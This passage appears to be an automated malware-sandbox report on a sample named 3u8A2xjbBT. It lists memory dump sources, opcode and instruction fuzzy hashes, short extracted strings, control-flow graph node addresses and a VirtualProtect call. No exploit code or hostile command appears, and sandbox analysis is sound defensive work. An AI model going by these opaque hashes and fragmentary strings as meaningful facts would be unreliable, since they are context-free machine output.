                                      • Opcode Fuzzy Hash: 297197a0c085c4a5ccd8b51316c571d0f149b504059c8741fa10cbe3895b6087
                                      • Instruction Fuzzy Hash: 8B310A70E142098BCB54CFFEC88059EFBBAEFC9311F18D52AC419AB358D23494528F19
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f76bda93e29160eadb812c6bbabfeedd94bcb5c0e30ded5006bf955a076facc9
                                      • Instruction ID: d683a799be8233ef428661fd50e5eb8925f6673a1b999675ffd6904d6b5e6088
                                      • Opcode Fuzzy Hash: f76bda93e29160eadb812c6bbabfeedd94bcb5c0e30ded5006bf955a076facc9
                                      • Instruction Fuzzy Hash: DF6219B06003019FE749DF59D45876A7AE6BBC4308F24C59CC0099F396CBBAE90B9BD5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98d71465b486814ebe7d61befff3413106f4fdf3eee9e96b00372e7b179ff4ec
                                      • Instruction ID: 51e490d46ac348817ee05009c7028b9016deb28f65e49319033de1acf18e4eb2
                                      • Opcode Fuzzy Hash: 98d71465b486814ebe7d61befff3413106f4fdf3eee9e96b00372e7b179ff4ec
                                      • Instruction Fuzzy Hash: 07621BB06003019FE748DF59D45876A7AE6FBC4308F24C59C80099F396CBBAE90B9BD5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2e8fb299d989b62b38e3de7795c455ef6ebd03c6a2c48491cecc060089873c9
                                      • Instruction ID: 6bbdca0720a6fe6f4177d2e838651b4661bdb972486d40438d94ff35232c9313
                                      • Opcode Fuzzy Hash: f2e8fb299d989b62b38e3de7795c455ef6ebd03c6a2c48491cecc060089873c9
                                      • Instruction Fuzzy Hash: B302C270D00229CFDB24DFA8C981BADBBB1FF49300F1095AAD419B7260EB749A85CF55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5009a7a36083d8426e2694e0777d2b5fbd9b3f87a3b9f8b1f070092ce51fe35b
                                      • Instruction ID: a3d7f13e7b49bd48c8a8d8df0322dda83818e107c65b4e0313c8ed968289c63b
                                      • Opcode Fuzzy Hash: 5009a7a36083d8426e2694e0777d2b5fbd9b3f87a3b9f8b1f070092ce51fe35b
                                      • Instruction Fuzzy Hash: 18A128B1E09649DBCB14CFA9D5409DEFBB5FB89300F20952AC426BB354DB349982CF19
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c61dd7cf6fb7314ffe38e3ee58d393b5669a62f361fa488fdb79f222706a1b66
                                      • Instruction ID: 2601920015c6a22e5d3a6a743b8974c3b670754dcae75d818968cec7045cd546
                                      • Opcode Fuzzy Hash: c61dd7cf6fb7314ffe38e3ee58d393b5669a62f361fa488fdb79f222706a1b66
                                      • Instruction Fuzzy Hash: 51A118B1E09649DBCB14CFA9D5409EEFBF1BB89300F21952AC426B7354DB349982CF19
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 13041ba2981aaf0d5cd4b1ac4b9d7cd60fd5d5bd187d1953fd1d6074a27b55cd
                                      • Instruction ID: 99d8e6e351e9b6a960dc86061da9fbb3d90f0316dccd76019478a5d07fe55388
                                      • Opcode Fuzzy Hash: 13041ba2981aaf0d5cd4b1ac4b9d7cd60fd5d5bd187d1953fd1d6074a27b55cd
                                      • Instruction Fuzzy Hash: 9F811134E15209AFCB04CFA9D88199EFBF1FF88350F14956AE415AB364D734AA02CF91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ebf64cbdb119b715ee1fb6e5d28423df8c8bfcbf154dfab86aa1a96e0430c06
                                      • Instruction ID: 98249c1f3ef5ce478443b27f7bfda717c9ac648c0ff20e9c340eac4dd6c91624
                                      • Opcode Fuzzy Hash: 4ebf64cbdb119b715ee1fb6e5d28423df8c8bfcbf154dfab86aa1a96e0430c06
                                      • Instruction Fuzzy Hash: B8811134E152099FCB04CFA9D88199EFBF1FF88350F14946AE415AB364D734AA41CF91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 35556d443d69024fc6a6d1e5a04e3b28a046688b32745c93c239942bd0e62ed0
                                      • Instruction ID: c7924e81a7316834e13dd617599174180e8abf55994ca65df157093f112f3b54
                                      • Opcode Fuzzy Hash: 35556d443d69024fc6a6d1e5a04e3b28a046688b32745c93c239942bd0e62ed0
                                      • Instruction Fuzzy Hash: FB7113B0E05219CFCB18CFE9D984AEEBBB2FB88310F10952AD516BB254D7349945CF25
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f35d5757ebef33c9188a5ae670cc393beb1832d71fcb63ba979546ee9ba68c9
                                      • Instruction ID: 0aa2b637d27491dd04e9f8084add3d69201ef251a9ba003329452bf15391ebe0
                                      • Opcode Fuzzy Hash: 8f35d5757ebef33c9188a5ae670cc393beb1832d71fcb63ba979546ee9ba68c9
                                      • Instruction Fuzzy Hash: 2571E2B4E0420ADFCB44CF99D9819AEFBB6FF88350F14951AD416AB314D730A982CF95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4cq$Hq$Hq$cq$cq
                                      • API String ID: 0-1334146734
                                      • Opcode ID: e90152e717f4d150fe7e68633e85c4d68a17698782b625fd398f2af0e9cd294c
                                      • Instruction ID: 01260d1e4b375e42012de5312eea2530c186e7528ef42fc431ea8aea817f7c57
                                      • Opcode Fuzzy Hash: e90152e717f4d150fe7e68633e85c4d68a17698782b625fd398f2af0e9cd294c
                                      • Instruction Fuzzy Hash: 5CE1D230B04246DFC705AFB5D4510ADBBF1BF9530071489AED8A6AB361EF30AD85C7A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /q$"\t$(Tt$^\t$$q
                                      • API String ID: 0-3152500879
                                      • Opcode ID: f00db3bc018ae94ecb55e64ac653d6b6f1a42ce9b6e91c0936332864ab52034f
                                      • Instruction ID: 22bf0d785321ef6b3300ad5dbb2edb1bc333aaa7e0d91906a2aecbb7dd809a1a
                                      • Opcode Fuzzy Hash: f00db3bc018ae94ecb55e64ac653d6b6f1a42ce9b6e91c0936332864ab52034f
                                      • Instruction Fuzzy Hash: 63B14D70B002049FDB59DBA9D594A6EBBE3FFCC600B148569D40ADB394DF34ED028BA1

                                      Execution Graph

                                      Execution Coverage:13.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 15345 2a1afe0 15346 2a1b02d VirtualProtect 15345->15346 15347 2a1b098 15346->15347

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]}t
                                      • API String ID: 0-2193755659
                                      • Opcode ID: 9141838911d75171bd04fcc6b08bff3b87be12861242c0875cf3dc94af0c576b
                                      • Instruction ID: 5f218fcd55a219a200fedc1534dbbad8ef5b0012d198bfd4ef6e23c7b983efc6
                                      • Opcode Fuzzy Hash: 9141838911d75171bd04fcc6b08bff3b87be12861242c0875cf3dc94af0c576b
                                      • Instruction Fuzzy Hash: DEF10674E19319CFCB14CFA5D9546ADBBF6BB89300F20A46AD40AEB354DB309E418F14

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]}t
                                      • API String ID: 0-2193755659
                                      • Opcode ID: d71cb58302484c5cc5b7a9f547521abb8c82fa4cfd06130f53b8e14eb4de810a
                                      • Instruction ID: 229626f5b136366fdc5265a8a6d75895dee52e9212d26df76cdfe7f42fe8c694
                                      • Opcode Fuzzy Hash: d71cb58302484c5cc5b7a9f547521abb8c82fa4cfd06130f53b8e14eb4de810a
                                      • Instruction Fuzzy Hash: 3AF1F474E15219CFDB18CFA5D954A9EBBF2BB89300F24946AD409E7358DB309E42CF14

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2t9H
                                      • API String ID: 0-1578986402
                                      • Opcode ID: 9f3988d863ca0cdbd3bdb8f8553d2c7362148c6860ecb1cafeb89a213d5b5e30
                                      • Instruction ID: d75654e4025009a60a26830ba7f7ecf1d936b61fcc05ffd43a0ac5087248cf73
                                      • Opcode Fuzzy Hash: 9f3988d863ca0cdbd3bdb8f8553d2c7362148c6860ecb1cafeb89a213d5b5e30
                                      • Instruction Fuzzy Hash: A3E13774E15318CFDB54CFA5D9A46AEFBF6BB89300F20A06AD40AA7354DB309942CF14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd

                                      Control-flow Graph

                                      control_flow_graph 67 5303e68-5303e89 69 5303eb5-5303ec4 67->69 70 5303e8b-5303eb4 67->70 73 5303ef2-5303eff 69->73 74 5303ec6-5303ef1 69->74 78 5303f01-5303f1d 73->78 79 5303f73-5303f76 73->79 87 5303f30-5303f35 78->87 88 5303f1f-5303f2e 78->88 82 5303f7e-5303fad 79->82 89 5303f44-5303f72 87->89 88->87 92 5303f37-5303f42 88->92 92->89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd

                                      Control-flow Graph

                                      control_flow_graph 271 5305db8-5305e1c call 53051c0 280 5305e4c-5305e88 call 5305cd0 271->280 281 5305e1e-5305e27 271->281 325 5305ec3-5305efc 280->325 326 5305e8a-5305ebc 280->326 282 5305efd-5305f11 281->282 283 5305e2d-5305e31 281->283 290 5305f13-5305f28 282->290 291 5305f3e-5305f3f 282->291 286 5305e39-5305e3b 283->286 288 5305e46-5305e4a 286->288 289 5305e3d-5305e3f 286->289 288->280 288->281 289->288 295 5305fe2-5305fe5 290->295 296 5305f29-5305f2e 290->296 293 5305f41-5305f43 291->293 294 5305f67-5305f75 291->294 293->296 297 5305f45 293->297 311 5305f85-5305f93 294->311 312 5305f77-5305f80 294->312 298 5305ff6-5305ffc 295->298 299 5305fe7-5305fea 295->299 300 5305f2f 296->300 297->300 303 5305f46-5305f54 297->303 306 5306011-530603a 298->306 307 5305ffe-5306001 298->307 304 5305fec-5305ff2 299->304 305 530600d-530600f 299->305 308 5305f30-5305f36 300->308 309 5305f39-5305f3d 300->309 330 5305f56-5305f62 303->330 331 5305fae-5305fb1 303->331 304->306 314 5305ff4 304->314 316 530603e-5306041 305->316 306->316 307->306 315 5306003-5306009 307->315 308->309 309->291 327 5305fa3-5305fa5 311->327 328 5305f95-5305f9e 311->328 312->316 319 530603c 314->319 315->306 320 530600b 315->320 319->316 320->319 326->325 327->331 328->316 330->316 336 5305fb3-5305fdc 331->336 337 5305fde-5305fe0 331->337 336->316 337->316
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd

                                      Control-flow Graph

                                      control_flow_graph 642 2a1afd8-2a1b096 VirtualProtect 645 2a1b098-2a1b09e 642->645 646 2a1b09f-2a1b0e7 642->646 645->646
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 02A1B086
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3710884134.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a10000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0

                                      Control-flow Graph

                                      control_flow_graph 650 2a1afe0-2a1b096 VirtualProtect 652 2a1b098-2a1b09e 650->652 653 2a1b09f-2a1b0e7 650->653 652->653
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 02A1B086
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3710884134.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a10000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0

                                      Control-flow Graph

                                      control_flow_graph 657 53049c8-5304a4f 666 5304a55-5304aa1 657->666 667 5304adc-5304b55 657->667 745 5304aa3 call 5304e98 666->745 746 5304aa3 call 5304e88 666->746 684 5304c80-5304ceb 667->684 685 5304b5b-5304c7e 667->685 681 5304aa9-5304ad5 681->667 702 5304cf2-5304d61 684->702 685->702 743 5304d63 call 5305db8 702->743 744 5304d63 call 5305da8 702->744 726 5304d69-5304dc0 737 5304dc2 726->737 738 5304de5-5304df5 726->738 739 5304dc5-5304dd0 737->739 740 5304dd2-5304dd5 739->740 741 5304ddc-5304de3 739->741 740->741 741->738 741->739 743->726 744->726 745->681 746->681
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pqq
                                      • API String ID: 0-1334384951
                                      • Opcode ID: b9d677cd66a0a02070849bb46c6b7cb9fb2b7353a529b0393d93e1c705386126
                                      • Instruction ID: ab664408af439ba2ae10337e293dfa66338ba5b71d8e5a2bfd6a55378a414d7c
                                      • Opcode Fuzzy Hash: b9d677cd66a0a02070849bb46c6b7cb9fb2b7353a529b0393d93e1c705386126
                                      • Instruction Fuzzy Hash: 00C1C735B102088FDB48EF79D59966D7BF2FF88711B248029E80ADB395DE749D02CB85

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q
                                      • API String ID: 0-1301096350
                                      • Opcode ID: 6226e924adb7a26db12312f6b117d0f32d75439a950405b6326f5ed59701deed
                                      • Instruction ID: a3c91cf3c76618e52af9f577fc6fcf41503a2e63b117a53b60da6f3b35831c6c
                                      • Opcode Fuzzy Hash: 6226e924adb7a26db12312f6b117d0f32d75439a950405b6326f5ed59701deed
                                      • Instruction Fuzzy Hash: 6EA1CFB5E003189FDB14CFA9D884BDEBBB1BF49300F10856AE818AB351DB749A85CF54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pq
                                      • API String ID: 0-153521182
                                      • Opcode ID: a2f17911d7c6023a7c2ddb275c62523ea3b07d9fde9df0dcf3706d942614a1a1
                                      • Instruction ID: e908372c9e0d57765c5d1d58adf0c633e223f7ebb8b907b2c08c765a3037f6e0
                                      • Opcode Fuzzy Hash: a2f17911d7c6023a7c2ddb275c62523ea3b07d9fde9df0dcf3706d942614a1a1
                                      • Instruction Fuzzy Hash: 0B81B376650100AFDB4A9F98D944E157FB6FF8D31471A80D8F20A8F272C772D861EB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hq
                                      • API String ID: 0-1594803414
                                      • Opcode ID: a7ffd8794d97e761aa3fbc7f3332ba71b85e70ea558edd4324386d44b27f9ee6
                                      • Instruction ID: 87c01af42a72d34acfd8e0417f2fb44ca03cc5c5166d4c51cab841938a14758a
                                      • Opcode Fuzzy Hash: a7ffd8794d97e761aa3fbc7f3332ba71b85e70ea558edd4324386d44b27f9ee6
                                      • Instruction Fuzzy Hash: 7061C536250104EFDB0A9F98D954D55BBB7FF8D32470A8099F60A8B272C772DC62EB50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Tt
                                      • API String ID: 0-3315984107
                                      • Opcode ID: 3eb0ac342d4eba8c881f98bff27ab5fd232bbe5cabba59a7bcf2c14be64c1702
                                      • Instruction ID: 19b803b16bff1d6e9b2a410c6850756667126942f0cbde7317b91082f09a30d5
                                      • Opcode Fuzzy Hash: 3eb0ac342d4eba8c881f98bff27ab5fd232bbe5cabba59a7bcf2c14be64c1702
                                      • Instruction Fuzzy Hash: E7313E357007058FDB19AB79D5A4A6E7BE3AFC9700B245428D40ACB799EE70EC028B95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (q
                                      • API String ID: 0-2414175341
                                      • Opcode ID: fb4bc9563122b4e768007484063102955cb54f273265ba2338ac25543397f30d
                                      • Instruction ID: 01afd47c7c61747dba0713d34efeb36b5a675c3d3e6ace0e1f43ce1f5317417f
                                      • Opcode Fuzzy Hash: fb4bc9563122b4e768007484063102955cb54f273265ba2338ac25543397f30d
                                      • Instruction Fuzzy Hash: D52126327042069FCB05EF34E85896EBFB5FF89310B14846AE506D7282CB34DD16CBA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: d351bdf6fcf0c13e6a7e88f3f99249ab02597d5e8164b7dccffb16ef7161938c
                                      • Instruction ID: 439dd86415d97244282b695931d50cccdcfefd7e4a6c1003bcc40a723fafb5dc
                                      • Opcode Fuzzy Hash: d351bdf6fcf0c13e6a7e88f3f99249ab02597d5e8164b7dccffb16ef7161938c
                                      • Instruction Fuzzy Hash: 19F09071A1020A9FCB04EBB5F50B78D7F75FF45301F0042A5E40ADB24AEA706E44DBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: c263f3a86eaa01a16c1a04a527cad78e71020600af8e80ee5875d6b321140671
                                      • Instruction ID: 91b59910304b500f16edf250adc3bc9d7207ebb6ccbecb0c9ae50d0b1f94d747
                                      • Opcode Fuzzy Hash: c263f3a86eaa01a16c1a04a527cad78e71020600af8e80ee5875d6b321140671
                                      • Instruction Fuzzy Hash: BEF08230A10209DFCB08EFA5F50A78D7F75FF41301B104265E409DB156DE702E049B92
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0119cc935a686ce1f48741c266cd23606cc79a8e5d80e0c2d5dce81e5cda8bc9
                                      • Instruction ID: e749e773ed657ff8395f2177ce08452777e40ac8098aa3a18a9f2f6484254c98
                                      • Opcode Fuzzy Hash: 0119cc935a686ce1f48741c266cd23606cc79a8e5d80e0c2d5dce81e5cda8bc9
                                      • Instruction Fuzzy Hash: FC416D74D1621DDFDB08CFA5D881A9DBBB2BF8A204F109955E40AEB324DB309E45CF94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5546929806cf5ace23b257c4d4f831b129683a99d2c076e2da2bab97a68dec30
                                      • Instruction ID: 1cb696f0034fed5cc8cd818a8a0f14fb6a5650ad8ba0c819dc50e438dc6be89c
                                      • Opcode Fuzzy Hash: 5546929806cf5ace23b257c4d4f831b129683a99d2c076e2da2bab97a68dec30
                                      • Instruction Fuzzy Hash: 5D318075E0125A9FCB04CFA8D9549DEFBB2FF89300F50856AE415B7290D730AD06CBA1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b87f6d55ec819cb589e9c62647ad23b419b5e1c00c87c33ff05131cc3c1ccec3
                                      • Instruction ID: 3433aef9c67550d1d2741886f37ce26b98c6030e764ee28c6ee05cb2066e9303
                                      • Opcode Fuzzy Hash: b87f6d55ec819cb589e9c62647ad23b419b5e1c00c87c33ff05131cc3c1ccec3
                                      • Instruction Fuzzy Hash: 10318B35A00705CFCB24DF28D59552EBBF2FF88201B148969E84A9B796DF30ED05CBA1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713454907.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5830000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37d0a5b63af99721f53de451d4a97f85af6b53f64689809d89f733b94993ee01
                                      • Instruction ID: 823aa560118155a3c982073bdee2fcc316fb1d7759f1436c39f6792bd6713fb7
                                      • Opcode Fuzzy Hash: 37d0a5b63af99721f53de451d4a97f85af6b53f64689809d89f733b94993ee01
                                      • Instruction Fuzzy Hash: 02318F75E0121A9FCB04DFA8D9559EEFBB2FF89300F508565E415B7250D730AD06CBA1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 788402b6d31125eefac3d5416fdfab2cae070336de501dbb55a5bae1b1fd3aaa
                                      • Instruction ID: 7a35c4bd50f62a6fa557fa9f3794845f6a8b5f7d266ea08d8ff27677ca789299
                                      • Opcode Fuzzy Hash: 788402b6d31125eefac3d5416fdfab2cae070336de501dbb55a5bae1b1fd3aaa
                                      • Instruction Fuzzy Hash: BD31B8B4D0125C9FDB14DFEAD988A9EFBF5BB08300F20902AE418BB250DB74A945CF54
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.3713192748.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_5300000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60f1edd77ffdc2da2d0da5f00d584a08c1ed89d7a1e8c91b7e83c80c65a5ee2f
                                      • Instruction ID: 3b45b97dfd4dfe552e4903cbd619576ad9ed20f996c9ca306c04e7daca8316b5
                                      • Opcode Fuzzy Hash: 60f1edd77ffdc2da2d0da5f00d584a08c1ed89d7a1e8c91b7e83c80c65a5ee2f
                                      • Instruction Fuzzy Hash: 49219536F002098BEB18CAA6D8297FFB7E7ABC8210F14507AE509E3190EA744D058794
                                      Memory Dump Source
